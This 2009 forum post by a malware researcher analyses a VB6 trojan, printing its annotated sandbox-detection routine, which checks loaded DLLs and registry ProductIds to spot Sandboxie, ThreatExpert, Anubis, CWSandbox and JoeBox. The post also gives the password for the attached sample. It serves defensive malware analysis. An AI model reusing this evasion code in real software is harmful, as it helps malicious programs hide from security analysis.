evilcry
January 27th, 2009, 03:52
Hi,
Joe from JoeBox pointed me to the attached malware, Trojan.Win32.VB.jir. It is written in VB6 and performs some basic checks
for online automated malware analysis tools such as:
Here is the sandbox detection function:
Malware Zip Password: infected
Regards,
Giuseppe 'Evilcry' Bonfa'
Joe from JoeBox pointed me to the attached malware, Trojan.Win32.VB.jir. It is written in VB6 and performs some basic checks
for online automated malware analysis tools such as:
Code:
Sandboxie
Threat Expert
Anubis
CWSandbox
JoeBox
VM:
VMware Workstation
VirtualPC
VirtualBox
Here is the sandbox detection function:
Code:
' IsInSandbox: returns True when the sample decides it is running inside one of
' five automated analysis environments (Sandboxie, ThreatExpert, Anubis,
' CWSandbox, JoeBox). Two indicators are used:
'   1. DLL names found in the module list of the current process.
'   2. The Windows ProductId registry value, compared with three hard-coded IDs.
' Analyst notes:
'   - No virtual-machine check (VMware, VirtualPC, VirtualBox) appears in this
'     routine; if the sample has one, it is implemented elsewhere.
'   - As posted, every InStr(...) call is missing its closing ")" before "> 0"
'     (probably lost in forum formatting), so the listing does not compile verbatim.
'   - The three ProductId strings are fixed constants, which makes them usable as
'     static signatures for this sample and is a reason for sandbox operators to
'     use a non-default ProductId on analysis images.
Public Function IsInSandbox() As Boolean
Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
Dim me32 As MODULEENTRY32
' Fixed-length 128-character buffer that receives the ProductId string.
Dim szBuffer As String * 128
' Indicator 1: snapshot of the modules loaded in the current process.
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)
' dwSize is filled in before the structure is handed to the Module32* calls.
me32.dwSize = Len(me32)
' NOTE(review): the entry filled in by Module32First is never compared, because
' the loop condition calls Module32Next before any name is tested.
Module32First hSnapShot, me32
Do While Module32Next(hSnapShot, me32) <> 0
' Lower-cased substring match on the module name. A hit only sets the return
' value; the loop keeps walking the remaining modules.
If InStr(1, LCase(me32.szModule), "sbiedll.dll"> 0 Then 'Sandboxie
IsInSandbox = True
' NOTE(review): dbghelp.dll is a general Windows debugging library, so this
' indicator is presumably not specific to ThreatExpert; any process that has it
' loaded would take this branch.
ElseIf InStr(1, LCase(me32.szModule), "dbghelp.dll"> 0 Then 'ThreatExpert
IsInSandbox = True
End If
Loop
CloseHandle (hSnapShot)
' Indicator 2: consulted only when no module name matched above.
If IsInSandbox = False Then
' Opens HKLM\Software\Microsoft\Windows\CurrentVersion. KEY_ALL_ACCESS is
' requested although only a value read follows; presumably the open fails
' without administrative rights, in which case the ProductId check is skipped
' (confirm during dynamic analysis).
hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, hKey)
' A return value of 0 is treated as success for both registry calls.
If hOpen = 0 Then
hQuery = RegQueryValueEx(hKey, "ProductId", 0, REG_SZ, szBuffer, 128)
If hQuery = 0 Then
' Substring comparison of the machine's ProductId with the IDs the author
' associates with each public sandbox (labels are the author's own).
If InStr(1, szBuffer, "76487-337-8429955-22614"> 0 Then 'Anubis
IsInSandbox = True
ElseIf InStr(1, szBuffer, "76487-644-3177037-23510"> 0 Then 'CWSandbox
IsInSandbox = True
ElseIf InStr(1, szBuffer, "55274-640-2673064-23950"> 0 Then 'JoeBox
IsInSandbox = True
End If
End If
End If
' NOTE(review): RegCloseKey is called even when RegOpenKeyEx failed and hKey
' was never assigned.
RegCloseKey (hKey)
End If
End Function
Malware Zip Password: infected
Regards,
Giuseppe 'Evilcry' Bonfa'